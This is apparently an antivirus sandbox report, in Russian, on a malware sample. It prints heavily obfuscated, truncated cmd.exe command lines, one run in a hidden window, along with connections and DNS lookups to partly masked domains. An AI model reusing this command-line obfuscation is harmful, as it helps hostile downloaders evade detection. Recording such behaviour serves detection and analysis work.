Техническая информация
- '<SYSTEM32>\cmd.exe' /c ^f^O^r ; ; /^F , ; " tokens= 2 delims=EFHMN" ; %^h ; ; ^iN ; ( , ' ; ft^^YpE , ; ^| ; fiNd^^str , H^^C ' ; ; ) ; ^do , ; %^h; ; n8ZAmId/vs~*t^@^Y)PUA^ ; ; h0XobFu/^C " ...
- 'fa#####ainfinito.com':80
- 'fa#####ainfinito.com':443
- http://fa#####ainfinito.com/EuuM4
- 'fa#####ainfinito.com':443
- DNS ASK fa#####ainfinito.com
- DNS ASK fi###eashop.ru
- DNS ASK er##tech.eu
- DNS ASK ev###city.net
- DNS ASK wo#####ss.logoinn.me
- '<SYSTEM32>\cmd.exe' /c ^f^O^r ; ; /^F , ; " tokens= 2 delims=EFHMN" ; %^h ; ; ^iN ; ( , ' ; ft^^YpE , ; ^| ; fiNd^^str , H^^C ' ; ; ) ; ^do , ; %^h; ; n8ZAmId/vs~*t^@^Y)PUA^ ; ; h0XobFu/^C " ...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ft^YpE | fiNd^str H^C
- '<SYSTEM32>\cmd.exe' /S /D /c" ftYpE "
- '<SYSTEM32>\findstr.exe' HC
- '<SYSTEM32>\cmd.exe' ; ; n8ZAmId/vs~*t@Y)PUA ; ; h0XobFu/C " , , ( (s^ET ^ ^` ^ =E=6^l2u^\^h^s'^y4D^w^XoWJNzL@^b^anGx, ^Ri^{f.P1+Fcme^3^v^0/jB^(krd;^}Z^)-^:tM^Sg^$^pOC) , ; , )& , ; f^oR , ; %^...